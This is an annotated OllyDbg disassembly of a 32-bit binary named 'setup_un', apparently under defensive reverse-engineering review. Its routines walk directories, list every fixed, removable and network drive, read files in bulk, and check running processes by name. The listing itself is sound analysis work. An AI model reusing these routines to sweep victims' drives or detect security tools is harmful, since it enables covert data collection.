004075C4 |. 8BD8 MOV EBX,EAX
004075C6 |. EB 18 JMP SHORT setup_un.004075E0            ; test the current entry first
004075C8 |> 8D43 18 /LEA EAX,DWORD PTR DS:[EBX+18]
004075CB |. 50 |PUSH EAX ; /pFindFileData
004075CC |. 8B43 14 |MOV EAX,DWORD PTR DS:[EBX+14] ; |
004075CF |. 50 |PUSH EAX ; |hFile
004075D0 |. E8 5FD5FFFF |CALL <JMP.&kernel32.FindNextFileA> ; \FindNextFileA
004075D5 |. 85C0 |TEST EAX,EAX
004075D7 |. 75 07 |JNZ SHORT setup_un.004075E0
004075D9 |. E8 7ED5FFFF |CALL <JMP.&kernel32.GetLastError> ; [GetLastError
004075DE |. EB 3F |JMP SHORT setup_un.0040761F           ; no more entries or error: return the error code
004075E0 |> 8B43 18 MOV EAX,DWORD PTR DS:[EBX+18]        ; first dword of find data (attributes)
004075E3 |. 2343 10 |AND EAX,DWORD PTR DS:[EBX+10]       ; any bit set in the mask at +10?
004075E6 |.^ 75 E0 \JNZ SHORT setup_un.004075C8          ; yes: skip this entry and fetch the next
004075E8 |. 54 PUSH ESP ; /pLocalFileTime
004075E9 |. 8D43 2C LEA EAX,DWORD PTR DS:[EBX+2C] ; |
004075EC |. 50 PUSH EAX ; |pFileTime
004075ED |. E8 2AD5FFFF CALL <JMP.&kernel32.FileTimeToLocalFileT>; \FileTimeToLocalFileTime
004075F2 |. 53 PUSH EBX ; /pDOSTime
004075F3 |. 8D43 02 LEA EAX,DWORD PTR DS:[EBX+2] ; |
004075F6 |. 50 PUSH EAX ; |pDOSDate
004075F7 |. 8D4424 08 LEA EAX,DWORD PTR SS:[ESP+8] ; |
004075FB |. 50 PUSH EAX ; |pFileTime
004075FC |. E8 13D5FFFF CALL <JMP.&kernel32.FileTimeToDosDateTim>; \FileTimeToDosDateTime
00407601 |. 8B43 38 MOV EAX,DWORD PTR DS:[EBX+38]
00407604 |. 8943 04 MOV DWORD PTR DS:[EBX+4],EAX         ; record +04 = dword at +38
00407607 |. 8B43 18 MOV EAX,DWORD PTR DS:[EBX+18]
0040760A |. 8943 08 MOV DWORD PTR DS:[EBX+8],EAX         ; record +08 = dword at +18
0040760D |. 8D43 0C LEA EAX,DWORD PTR DS:[EBX+C]
00407610 |. 8D53 44 LEA EDX,DWORD PTR DS:[EBX+44]
00407613 |. B9 04010000 MOV ECX,104                      ; 104h = 260 bytes maximum
00407618 |. E8 97C8FFFF CALL setup_un.00403EB4           ; presumably builds the string at +0C from the buffer at +44 - helper not shown
0040761D |. 33C0 XOR EAX,EAX                             ; success
0040761F |> 59 POP ECX                                   ; release the 8-byte local
00407620 |. 5A POP EDX
00407621 |. 5B POP EBX
00407622 \. C3 RETN
00407623 90 NOP
; ---------------------------------------------------------------------------
; 00407624 - close the find handle held in a search record.
; In:    EAX = pointer to the search record; handle is the dword at +14.
; Does nothing when the handle is already -1 (INVALID_HANDLE_VALUE);
; otherwise calls FindClose and resets the field to -1 so a second call
; is harmless.
; ---------------------------------------------------------------------------
00407624 /$ 53 PUSH EBX
00407625 |. 8BD8 MOV EBX,EAX
00407627 |. 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
0040762A |. 83F8 FF CMP EAX,-1
0040762D |. 74 0D JE SHORT setup_un.0040763C
0040762F |. 50 PUSH EAX ; /hSearch
00407630 |. E8 EFD4FFFF CALL <JMP.&kernel32.FindClose> ; \FindClose
00407635 |. C743 14 FFFFF>MOV DWORD PTR DS:[EBX+14],-1
0040763C |> 5B POP EBX
0040763D \. C3 RETN
0040763E 8BC0 MOV EAX,EAX
; ---------------------------------------------------------------------------
; 00407640 - begin a file search.
; In:    EAX = search pattern (string), EDX = attribute argument,
;        ECX = pointer to the search record.
; Out:   EAX = 0 on success, otherwise an error code (GetLastError when
;        FindFirstFileA fails, or the result of 004075C0).
; Stores (NOT EDX) AND 1Eh at record+10 as the mask used by 004075C0, the
; find handle at record+14, and closes the handle again (00407624) when
; 004075C0 reports failure.
; ---------------------------------------------------------------------------
00407640 /$ 53 PUSH EBX
00407641 |. 56 PUSH ESI
00407642 |. 57 PUSH EDI
00407643 |. 8BD9 MOV EBX,ECX                             ; EBX = search record
00407645 |. 8BF8 MOV EDI,EAX                             ; EDI = pattern
00407647 |. F7D2 NOT EDX
00407649 |. 83E2 1E AND EDX,1E
0040764C |. 8953 10 MOV DWORD PTR DS:[EBX+10],EDX        ; mask of bits not requested, limited to 1Eh
0040764F |. 8D43 18 LEA EAX,DWORD PTR DS:[EBX+18]
00407652 |. 50 PUSH EAX                                  ; second FindFirstFileA argument: find-data buffer
00407653 |. 8BC7 MOV EAX,EDI
00407655 |. E8 72CAFFFF CALL setup_un.004040CC           ; presumably converts the string to a C-string pointer - helper not shown
0040765A |. 50 PUSH EAX ; |FileName
0040765B |. E8 CCD4FFFF CALL <JMP.&kernel32.FindFirstFileA> ; \FindFirstFileA
00407660 |. 8BF0 MOV ESI,EAX
00407662 |. 8973 14 MOV DWORD PTR DS:[EBX+14],ESI        ; keep the handle in the record
00407665 |. 83FE FF CMP ESI,-1
00407668 |. 74 16 JE SHORT setup_un.00407680
0040766A |. 8BC3 MOV EAX,EBX
0040766C |. E8 4FFFFFFF CALL setup_un.004075C0           ; filter and copy the first matching entry
00407671 |. 8BF0 MOV ESI,EAX
00407673 |. 85F6 TEST ESI,ESI
00407675 |. 74 10 JE SHORT setup_un.00407687
00407677 |. 8BC3 MOV EAX,EBX
00407679 |. E8 A6FFFFFF CALL setup_un.00407624           ; nothing matched: close the handle
0040767E |. EB 07 JMP SHORT setup_un.00407687
00407680 |> E8 D7D4FFFF CALL <JMP.&kernel32.GetLastError> ; [GetLastError
00407685 |. 8BF0 MOV ESI,EAX
00407687 |> 8BC6 MOV EAX,ESI                             ; return value
00407689 |. 5F POP EDI
0040768A |. 5E POP ESI
0040768B |. 5B POP EBX
0040768C \. C3 RETN
0040768D 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
; ---------------------------------------------------------------------------
; 00407690 - continue a file search.
; In:    EAX = pointer to the search record (handle at +14, find data at +18).
; Out:   EAX = result of 004075C0 when FindNextFileA succeeds, otherwise
;        the GetLastError value.
; ---------------------------------------------------------------------------
00407690 /$ 53 PUSH EBX
00407691 |. 8BD8 MOV EBX,EAX
00407693 |. 8D43 18 LEA EAX,DWORD PTR DS:[EBX+18]
00407696 |. 50 PUSH EAX ; /pFindFileData
00407697 |. 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14] ; |
0040769A |. 50 PUSH EAX ; |hFile
0040769B |. E8 94D4FFFF CALL <JMP.&kernel32.FindNextFileA> ; \FindNextFileA
004076A0 |. 85C0 TEST EAX,EAX
004076A2 |. 74 09 JE SHORT setup_un.004076AD
004076A4 |. 8BC3 MOV EAX,EBX
004076A6 |. E8 15FFFFFF CALL setup_un.004075C0           ; apply the attribute filter and copy the entry
004076AB |. 5B POP EBX
004076AC |. C3 RETN
004076AD |> E8 AAD4FFFF CALL <JMP.&kernel32.GetLastError> ; [GetLastError
004076B2 |. 5B POP EBX
004076B3 \. C3 RETN
; ---------------------------------------------------------------------------
; 004076B4 - collect the drive letters whose drive type is 2, 3 or 4.
; In:    EAX = destination passed on to 00403ED4 (kept in EDI).
; Loops ESI = 0..19h, forms the character ESI+41h ('A'..'Z'), builds
; "<letter>:\" and calls GetDriveTypeA on it. Return values 2, 3 and 4 are
; DRIVE_REMOVABLE, DRIVE_FIXED and DRIVE_REMOTE; for those the letter is
; handed to 00403ED4 together with the destination.
; NOTE(review): 00403E2C, 00403F18, 004040CC, 00403ED4 and 00403C68 are
; outside this listing; presumably string-from-char, concatenate, to-C-string,
; append and clear-N-strings - confirm.
; Defender note: the result covers removable and network drives as well as
; fixed disks, i.e. every volume a later file walk could reach.
; Locals: [EBP-4], [EBP-8], [EBP-C] = three temporaries, zero-initialized and
; released at 00407736 under an SEH frame (handler stub 00407744).
; ---------------------------------------------------------------------------
004076B4 /$ 55 PUSH EBP
004076B5 |. 8BEC MOV EBP,ESP
004076B7 |. 6A 00 PUSH 0                                 ; [EBP-4] = 0
004076B9 |. 6A 00 PUSH 0                                 ; [EBP-8] = 0
004076BB |. 6A 00 PUSH 0                                 ; [EBP-C] = 0
004076BD |. 53 PUSH EBX
004076BE |. 56 PUSH ESI
004076BF |. 57 PUSH EDI
004076C0 |. 8BF8 MOV EDI,EAX
004076C2 |. 33C0 XOR EAX,EAX
004076C4 |. 55 PUSH EBP
004076C5 |. 68 44774000 PUSH setup_un.00407744
004076CA |. 64:FF30 PUSH DWORD PTR FS:[EAX]
004076CD |. 64:8920 MOV DWORD PTR FS:[EAX],ESP           ; install the SEH frame
004076D0 |. 33F6 XOR ESI,ESI                             ; ESI = letter index
004076D2 |> 8D5E 41 /LEA EBX,DWORD PTR DS:[ESI+41]       ; EBX = 'A' + index
004076D5 |. 8D45 F8 |LEA EAX,DWORD PTR SS:[EBP-8]
004076D8 |. 8BD3 |MOV EDX,EBX
004076DA |. E8 4DC7FFFF |CALL setup_un.00403E2C
004076DF |. 8B55 F8 |MOV EDX,DWORD PTR SS:[EBP-8]
004076E2 |. 8D45 FC |LEA EAX,DWORD PTR SS:[EBP-4]
004076E5 |. B9 5C774000 |MOV ECX,setup_un.0040775C ; :\
004076EA |. E8 29C8FFFF |CALL setup_un.00403F18
004076EF |. 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
004076F2 |. E8 D5C9FFFF |CALL setup_un.004040CC
004076F7 |. 50 |PUSH EAX ; /RootPathName
004076F8 |. E8 4FD4FFFF |CALL <JMP.&kernel32.GetDriveTypeA> ; \GetDriveTypeA
004076FD |. 66:83F8 03 |CMP AX,3                         ; DRIVE_FIXED
00407701 |. 74 0C |JE SHORT setup_un.0040770F
00407703 |. 66:83F8 04 |CMP AX,4                         ; DRIVE_REMOTE
00407707 |. 74 06 |JE SHORT setup_un.0040770F
00407709 |. 66:83F8 02 |CMP AX,2                         ; DRIVE_REMOVABLE
0040770D |. 75 14 |JNZ SHORT setup_un.00407723           ; any other type: skip this letter
0040770F |> 8D45 F4 |LEA EAX,DWORD PTR SS:[EBP-C]
00407712 |. 8BD3 |MOV EDX,EBX
00407714 |. E8 13C7FFFF |CALL setup_un.00403E2C
00407719 |. 8B55 F4 |MOV EDX,DWORD PTR SS:[EBP-C]
0040771C |. 8BC7 |MOV EAX,EDI
0040771E |. E8 B1C7FFFF |CALL setup_un.00403ED4           ; hand the letter to the destination
00407723 |> 46 |INC ESI
00407724 |. 83FE 1A |CMP ESI,1A                          ; 26 letters
00407727 |.^ 75 A9 \JNZ SHORT setup_un.004076D2
00407729 |. 33C0 XOR EAX,EAX
0040772B |. 5A POP EDX
0040772C |. 59 POP ECX
0040772D |. 59 POP ECX
0040772E |. 64:8910 MOV DWORD PTR FS:[EAX],EDX           ; remove the SEH frame
00407731 |. 68 4B774000 PUSH setup_un.0040774B           ; address the cleanup's RETN continues at
00407736 |> 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
00407739 |. BA 03000000 MOV EDX,3                        ; three temporaries starting at [EBP-C]
0040773E |. E8 25C5FFFF CALL setup_un.00403C68
00407743 \. C3 RETN
00407744 .^ E9 1BBFFFFF JMP setup_un.00403664            ; handler stub; 00403664 is outside this listing
00407749 .^ EB EB JMP SHORT setup_un.00407736
0040774B . 5F POP EDI
0040774C . 5E POP ESI
0040774D . 5B POP EBX
0040774E . 8BE5 MOV ESP,EBP
00407750 . 5D POP EBP
00407751 . C3 RETN
00407752 00 DB 00
00407753 00 DB 00
00407754 . FFFFFFFF DD FFFFFFFF
00407758 . 02000000 DD 00000002
0040775C . 3A 5C 00 ASCII ":\",0
0040775F 00 DB 00
; ---------------------------------------------------------------------------
; 00407760 - read a file in 5000h-byte chunks into an output string.
; In:    EAX = first argument, saved at [EBP-4] and passed to 00402AD8
;              (presumably the file name);
;        EDX = second argument, kept in EBX (pointer to the output string).
; Frame: 5000h-byte buffer at [EBP+FFFFAEAC] (EBP-5154h), a temporary at
;        [EBP+FFFFAEA8] (EBP-5158h), a 14Ch-byte file record at [EBP-154],
;        and a dword at [EBP-8] whose address is passed to 00402C28.
; Flow:  clear output -> 00402AD8 / 00402EB8 on the file record -> 00402D28
;        result kept in EDI -> loop { 00402C28 reads up to 5000h bytes,
;        00403D34 + 00403ED4 add the whole buffer to the output } until
;        00402CBC returns non-zero or ESI exceeds 4B0h chunks -> 00402C48 ->
;        if EDI is less than the output length, 0040412C is called with
;        (output, 1, EDI).
; NOTE(review): the helpers are outside this listing. Presumably Assign,
; Reset, FileSize, BlockRead, Eof, Close and Copy, with 00402614 as the I/O
; result check and [40E2BC] pointing at the file-open mode - confirm.
; The dword at [EBP-8] is not read back in the visible code, so each pass
; adds a full 5000h bytes; the final 0040412C call is what would trim the
; output to the size in EDI.
; Two nested SEH frames: inner handler stub 0040788B, outer stub 004078B6.
; ---------------------------------------------------------------------------
00407760 $ 55 PUSH EBP
00407761 . 8BEC MOV EBP,ESP
00407763 . 50 PUSH EAX                                   ; save the first argument at [EBP-4]
00407764 . B8 05000000 MOV EAX,5                         ; 5 passes x 1000h bytes = 5000h of stack
00407769 > 81C4 04F0FFFF ADD ESP,-0FFC
0040776F . 50 PUSH EAX                                   ; touch each page while growing the stack
00407770 . 48 DEC EAX
00407771 .^ 75 F6 JNZ SHORT setup_un.00407769
00407773 . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]          ; reload the first argument
00407776 . 81C4 ACFEFFFF ADD ESP,-154
0040777C . 53 PUSH EBX
0040777D . 56 PUSH ESI
0040777E . 57 PUSH EDI
0040777F . 33C9 XOR ECX,ECX
00407781 . 898D A8AEFFFF MOV DWORD PTR SS:[EBP+FFFFAEA8],ECX ; temporary = 0
00407787 . 8BDA MOV EBX,EDX                              ; EBX = output pointer
00407789 . 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
0040778C . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
0040778F . E8 28C9FFFF CALL setup_un.004040BC
00407794 . 33C0 XOR EAX,EAX
00407796 . 55 PUSH EBP
00407797 . 68 B6784000 PUSH setup_un.004078B6
0040779C . 64:FF30 PUSH DWORD PTR FS:[EAX]
0040779F . 64:8920 MOV DWORD PTR FS:[EAX],ESP            ; outer SEH frame
004077A2 . 33C0 XOR EAX,EAX
004077A4 . 55 PUSH EBP
004077A5 . 68 8B784000 PUSH setup_un.0040788B
004077AA . 64:FF30 PUSH DWORD PTR FS:[EAX]
004077AD . 64:8920 MOV DWORD PTR FS:[EAX],ESP            ; inner SEH frame
004077B0 . 33F6 XOR ESI,ESI                              ; ESI = chunk counter
004077B2 . 8BC3 MOV EAX,EBX
004077B4 . E8 8BC4FFFF CALL setup_un.00403C44            ; called on the output pointer before reading
004077B9 . 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
004077BC . 8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
004077C2 . E8 11B3FFFF CALL setup_un.00402AD8
004077C7 . A1 BCE24000 MOV EAX,DWORD PTR DS:[40E2BC]
004077CC . C600 00 MOV BYTE PTR DS:[EAX],0               ; byte behind the pointer at 40E2BC = 0
004077CF . BA 01000000 MOV EDX,1
004077D4 . 8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
004077DA . E8 D9B6FFFF CALL setup_un.00402EB8
004077DF . E8 30AEFFFF CALL setup_un.00402614
004077E4 . 8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
004077EA . E8 39B5FFFF CALL setup_un.00402D28
004077EF . E8 20AEFFFF CALL setup_un.00402614
004077F4 . 8BF8 MOV EDI,EAX                              ; EDI = value later compared with the output length
004077F6 . EB 4B JMP SHORT setup_un.00407843             ; enter the loop at its condition
004077F8 > 46 INC ESI
004077F9 . 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
004077FC . 50 PUSH EAX ; /Arg1
004077FD . 8D95 ACAEFFFF LEA EDX,DWORD PTR SS:[EBP+FFFFAEAC] ; |
00407803 . B9 00500000 MOV ECX,5000 ; |
00407808 . 8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154] ; |
0040780E . E8 15B4FFFF CALL setup_un.00402C28 ; \setup_un.00402C28
00407813 . E8 FCADFFFF CALL setup_un.00402614
00407818 . 8D85 A8AEFFFF LEA EAX,DWORD PTR SS:[EBP+FFFFAEA8]
0040781E . 8D95 ACAEFFFF LEA EDX,DWORD PTR SS:[EBP+FFFFAEAC]
00407824 . B9 00500000 MOV ECX,5000                      ; full buffer size, not the count actually read
00407829 . E8 06C5FFFF CALL setup_un.00403D34
0040782E . 8B95 A8AEFFFF MOV EDX,DWORD PTR SS:[EBP+FFFFAEA8]
00407834 . 8BC3 MOV EAX,EBX
00407836 . E8 99C6FFFF CALL setup_un.00403ED4
0040783B . 81FE B0040000 CMP ESI,4B0
00407841 . 7F 14 JG SHORT setup_un.00407857              ; hard cap on the number of chunks
00407843 > 8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
00407849 . E8 6EB4FFFF CALL setup_un.00402CBC
0040784E . E8 C1ADFFFF CALL setup_un.00402614
00407853 . 84C0 TEST AL,AL
00407855 .^ 74 A1 JE SHORT setup_un.004077F8             ; AL = 0: read another chunk
00407857 > 8D85 ACFEFFFF LEA EAX,DWORD PTR SS:[EBP-154]
0040785D . E8 E6B3FFFF CALL setup_un.00402C48
00407862 . E8 ADADFFFF CALL setup_un.00402614
00407867 . 8B03 MOV EAX,DWORD PTR DS:[EBX]
00407869 . E8 5EC6FFFF CALL setup_un.00403ECC
0040786E . 3BF8 CMP EDI,EAX
00407870 . 7D 0F JGE SHORT setup_un.00407881             ; skip the trim when EDI >= returned length
00407872 . 53 PUSH EBX
00407873 . 8B03 MOV EAX,DWORD PTR DS:[EBX]
00407875 . 8BCF MOV ECX,EDI
00407877 . BA 01000000 MOV EDX,1
0040787C . E8 ABC8FFFF CALL setup_un.0040412C
00407881 > 33C0 XOR EAX,EAX
00407883 . 5A POP EDX
00407884 . 59 POP ECX
00407885 . 59 POP ECX
00407886 . 64:8910 MOV DWORD PTR FS:[EAX],EDX            ; remove the inner SEH frame
00407889 . EB 0A JMP SHORT setup_un.00407895
0040788B .^ E9 A8BCFFFF JMP setup_un.00403538            ; inner handler stub; target outside this listing
00407890 . E8 5BBEFFFF CALL setup_un.004036F0
00407895 > 33C0 XOR EAX,EAX
00407897 . 5A POP EDX
00407898 . 59 POP ECX
00407899 . 59 POP ECX
0040789A . 64:8910 MOV DWORD PTR FS:[EAX],EDX            ; remove the outer SEH frame
0040789D . 68 BD784000 PUSH setup_un.004078BD            ; address the cleanup's RETN continues at
004078A2 > 8D85 A8AEFFFF LEA EAX,DWORD PTR SS:[EBP+FFFFAEA8]
004078A8 . E8 97C3FFFF CALL setup_un.00403C44
004078AD . 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004078B0 . E8 8FC3FFFF CALL setup_un.00403C44
004078B5 . C3 RETN
004078B6 .^ E9 A9BDFFFF JMP setup_un.00403664            ; outer handler stub; target outside this listing
004078BB .^ EB E5 JMP SHORT setup_un.004078A2
004078BD . 5F POP EDI
004078BE . 5E POP ESI
004078BF . 5B POP EBX
004078C0 . 8BE5 MOV ESP,EBP
004078C2 . 5D POP EBP
004078C3 . C3 RETN
; ---------------------------------------------------------------------------
; 004078C4 - test whether any enumerated entry matches the given name.
; In:    EAX = name to look for (saved at [EBP-4]).
; Out:   EAX = EBX; BL is set to 1 when a comparison matched, 0 otherwise.
; Flow:  00405028(2, 0) returns a handle (closed with CloseHandle at the
;        end). A 128h-byte structure at [EBP-138] has its first dword set to
;        128h and is filled by 00405048, then by 00405068 on each pass while
;        the helper returns non-zero. Each pass builds strings from the
;        104h-byte field at [EBP-114] (structure offset +24h) and from the
;        input name, passes them through 00405644 / 00405700, and compares
;        them with 00404018.
; NOTE(review): the helpers are outside this listing. The size 128h with a
; name field at +24h matches PROCESSENTRY32, so 00405028 / 00405048 /
; 00405068 are presumably CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS),
; Process32First and Process32Next, and 00405644 / 00405700 presumably
; file-name extraction and case folding - confirm.
; The loop does not stop at the first match; it walks the whole list.
; SEH frame handler stub: 00407A1C.
; ---------------------------------------------------------------------------
004078C4 /$ 55 PUSH EBP
004078C5 |. 8BEC MOV EBP,ESP
004078C7 |. 81C4 B8FEFFFF ADD ESP,-148
004078CD |. 53 PUSH EBX
004078CE |. 56 PUSH ESI
004078CF |. 57 PUSH EDI
004078D0 |. 33D2 XOR EDX,EDX
004078D2 |. 8995 B8FEFFFF MOV DWORD PTR SS:[EBP-148],EDX  ; zero the seven temporaries
004078D8 |. 8995 BCFEFFFF MOV DWORD PTR SS:[EBP-144],EDX
004078DE |. 8995 C4FEFFFF MOV DWORD PTR SS:[EBP-13C],EDX
004078E4 |. 8995 C0FEFFFF MOV DWORD PTR SS:[EBP-140],EDX
004078EA |. 8955 F8 MOV DWORD PTR SS:[EBP-8],EDX
004078ED |. 8955 F4 MOV DWORD PTR SS:[EBP-C],EDX
004078F0 |. 8955 F0 MOV DWORD PTR SS:[EBP-10],EDX
004078F3 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX          ; keep the name argument
004078F6 |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
004078F9 |. E8 BEC7FFFF CALL setup_un.004040BC
004078FE |. 33C0 XOR EAX,EAX
00407900 |. 55 PUSH EBP
00407901 |. 68 1C7A4000 PUSH setup_un.00407A1C
00407906 |. 64:FF30 PUSH DWORD PTR FS:[EAX]
00407909 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP           ; install the SEH frame
0040790C |. 33DB XOR EBX,EBX                             ; BL = result flag, starts at 0
0040790E |. 33D2 XOR EDX,EDX
00407910 |. B8 02000000 MOV EAX,2
00407915 |. E8 0ED7FFFF CALL setup_un.00405028
0040791A |. 8BF0 MOV ESI,EAX                             ; ESI = handle, closed at 004079EC
0040791C |. C785 C8FEFFFF>MOV DWORD PTR SS:[EBP-138],128
00407926 |. 8D95 C8FEFFFF LEA EDX,DWORD PTR SS:[EBP-138]
0040792C |. 8BC6 MOV EAX,ESI
0040792E |. E8 15D7FFFF CALL setup_un.00405048           ; first entry
00407933 |. E9 AB000000 JMP setup_un.004079E3            ; enter the loop at its condition
00407938 |> BF 04010000 /MOV EDI,104
0040793D |. 8D85 C0FEFFFF |LEA EAX,DWORD PTR SS:[EBP-140]
00407943 |. 8D95 ECFEFFFF |LEA EDX,DWORD PTR SS:[EBP-114]
00407949 |. B9 04010000 |MOV ECX,104
0040794E |. E8 61C5FFFF |CALL setup_un.00403EB4           ; string from the entry's name field
00407953 |. 8B85 C0FEFFFF |MOV EAX,DWORD PTR SS:[EBP-140]
00407959 |. 8D95 C4FEFFFF |LEA EDX,DWORD PTR SS:[EBP-13C]
0040795F |. E8 E0DCFFFF |CALL setup_un.00405644
00407964 |. 8B85 C4FEFFFF |MOV EAX,DWORD PTR SS:[EBP-13C]
0040796A |. 8D55 F8 |LEA EDX,DWORD PTR SS:[EBP-8]
0040796D |. E8 8EDDFFFF |CALL setup_un.00405700           ; [EBP-8] = processed entry name (via 00405644)
00407972 |. 8D85 BCFEFFFF |LEA EAX,DWORD PTR SS:[EBP-144]
00407978 |. 50 |PUSH EAX
00407979 |. 8BCF |MOV ECX,EDI
0040797B |. BA 01000000 |MOV EDX,1
00407980 |. 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
00407983 |. E8 A4C7FFFF |CALL setup_un.0040412C           ; called with (name argument, 1, 104h)
00407988 |. 8B85 BCFEFFFF |MOV EAX,DWORD PTR SS:[EBP-144]
0040798E |. 8D55 F4 |LEA EDX,DWORD PTR SS:[EBP-C]
00407991 |. E8 6ADDFFFF |CALL setup_un.00405700           ; [EBP-C] = processed name argument
00407996 |. 8D85 B8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-148]
0040799C |. 8D95 ECFEFFFF |LEA EDX,DWORD PTR SS:[EBP-114]
004079A2 |. B9 04010000 |MOV ECX,104
004079A7 |. E8 08C5FFFF |CALL setup_un.00403EB4
004079AC |. 8B85 B8FEFFFF |MOV EAX,DWORD PTR SS:[EBP-148]
004079B2 |. 8D55 F0 |LEA EDX,DWORD PTR SS:[EBP-10]
004079B5 |. E8 46DDFFFF |CALL setup_un.00405700           ; [EBP-10] = processed entry name (without 00405644)
004079BA |. 8B45 F8 |MOV EAX,DWORD PTR SS:[EBP-8]
004079BD |. 8B55 F4 |MOV EDX,DWORD PTR SS:[EBP-C]
004079C0 |. E8 53C6FFFF |CALL setup_un.00404018           ; compare [EBP-8] with [EBP-C]
004079C5 |. 74 0D |JE SHORT setup_un.004079D4
004079C7 |. 8B45 F0 |MOV EAX,DWORD PTR SS:[EBP-10]
004079CA |. 8B55 F4 |MOV EDX,DWORD PTR SS:[EBP-C]
004079CD |. E8 46C6FFFF |CALL setup_un.00404018           ; compare [EBP-10] with [EBP-C]
004079D2 |. 75 02 |JNZ SHORT setup_un.004079D6
004079D4 |> B3 01 |MOV BL,1                              ; either comparison equal: flag a match
004079D6 |> 8D95 C8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-138]
004079DC |. 8BC6 |MOV EAX,ESI
004079DE |. E8 85D6FFFF |CALL setup_un.00405068           ; next entry
004079E3 |> 85C0 TEST EAX,EAX
004079E5 |.^ 0F85 4DFFFFFF \JNZ setup_un.00407938
004079EB |. 56 PUSH ESI ; /hObject
004079EC |. E8 EBD0FFFF CALL <JMP.&kernel32.CloseHandle> ; \CloseHandle
004079F1 |. 33C0 XOR EAX,EAX
004079F3 |. 5A POP EDX
004079F4 |. 59 POP ECX
004079F5 |. 59 POP ECX
004079F6 |. 64:8910 MOV DWORD PTR FS:[EAX],EDX           ; remove the SEH frame
004079F9 |. 68 237A4000 PUSH setup_un.00407A23           ; address the cleanup's RETN continues at
004079FE |> 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
00407A04 |. BA 04000000 MOV EDX,4                        ; four temporaries starting at [EBP-148]
00407A09 |. E8 5AC2FFFF CALL setup_un.00403C68
00407A0E |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
00407A11 |. BA 04000000 MOV EDX,4                        ; four temporaries starting at [EBP-10]
00407A16 |. E8 4DC2FFFF CALL setup_un.00403C68
00407A1B \. C3 RETN
00407A1C .^ E9 43BCFFFF JMP setup_un.00403664            ; handler stub; 00403664 is outside this listing
00407A21 .^ EB DB JMP SHORT setup_un.004079FE
00407A23 . 8BC3 MOV EAX,EBX                              ; return the match flag
00407A25 . 5F POP EDI
00407A26 . 5E POP ESI
00407A27 . 5B POP EBX
00407A28 . 8BE5 MOV ESP,EBP
00407A2A . 5D POP EBP
00407A2B . C3 RETN
; ----------------------------------------------------------------------
; setup_un.00407A2C  (32-bit x86, OllyDbg listing, Intel operand order)
; In:    EAX = caller's argument (kept in EBX, forwarded to 00407640)
; Out:   EAX = dword at local buffer+4 when 00407640 returns 0, else -1
; Stack: 0x15C bytes of locals; [EBP-15C..EBP-5] is a local buffer
;        (at most 0x158 bytes), [EBP-4] is the result slot.
; Saves: EBX (pushed/popped). No stack arguments (plain RETN).
; Flow:  two nested FS:[0] exception frames guard the call; the inner
;        cleanup calls 00407624 on the buffer, the outer cleanup calls
;        004044D8 on the buffer with the value read from DS:[4075A0].
; NOTE(review): the 0x3F mask, the record size and the "+4 or -1" result
;        resemble a Delphi FindFirst/FindClose "file size" helper - this
;        is inferred from shape only; confirm against 00407640/00407624.
;        Which path is queried depends on the callers, not shown here.
; ----------------------------------------------------------------------
00407A2C /$ 55 PUSH EBP
00407A2D |. 8BEC MOV EBP,ESP
00407A2F |. 81C4 A4FEFFFF ADD ESP,-15C ; reserve 0x15C bytes of locals
00407A35 |. 53 PUSH EBX ; EBX is restored at 00407AD6
00407A36 |. 8BD8 MOV EBX,EAX ; keep the incoming argument across the calls below
00407A38 |. 8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C] ; EAX = &local buffer
00407A3E |. 8B15 A0754000 MOV EDX,DWORD PTR DS:[4075A0] ; setup_un.004075A4 - same value is passed to 004044D8 at 00407AC0
00407A44 |. E8 CBC9FFFF CALL setup_un.00404414 ; presumably initialises the buffer from that descriptor - TODO confirm
00407A49 |. 33C0 XOR EAX,EAX ; EAX = 0 so FS:[EAX] addresses FS:[0]
00407A4B |. 55 PUSH EBP
00407A4C |. 68 CC7A4000 PUSH setup_un.00407ACC ; outer frame: handler stub
00407A51 |. 64:FF30 PUSH DWORD PTR FS:[EAX] ; save previous FS:[0]
00407A54 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP ; install outer exception frame
00407A57 |. 33C0 XOR EAX,EAX
00407A59 |. 55 PUSH EBP
00407A5A |. 68 A67A4000 PUSH setup_un.00407AA6 ; inner frame: handler stub
00407A5F |. 64:FF30 PUSH DWORD PTR FS:[EAX]
00407A62 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP ; install inner exception frame
00407A65 |. 8D8D A4FEFFFF LEA ECX,DWORD PTR SS:[EBP-15C] ; ECX = &local buffer (filled by the callee, see read at 00407A7B)
00407A6B |. BA 3F000000 MOV EDX,3F ; constant 0x3F - looks like an attribute mask, TODO confirm
00407A70 |. 8BC3 MOV EAX,EBX ; EAX = original argument
00407A72 |. E8 C9FBFFFF CALL setup_un.00407640
00407A77 |. 85C0 TEST EAX,EAX
00407A79 |. 75 0B JNZ SHORT setup_un.00407A86 ; non-zero return -> failure path
00407A7B |. 8B85 A8FEFFFF MOV EAX,DWORD PTR SS:[EBP-158] ; dword at buffer+4
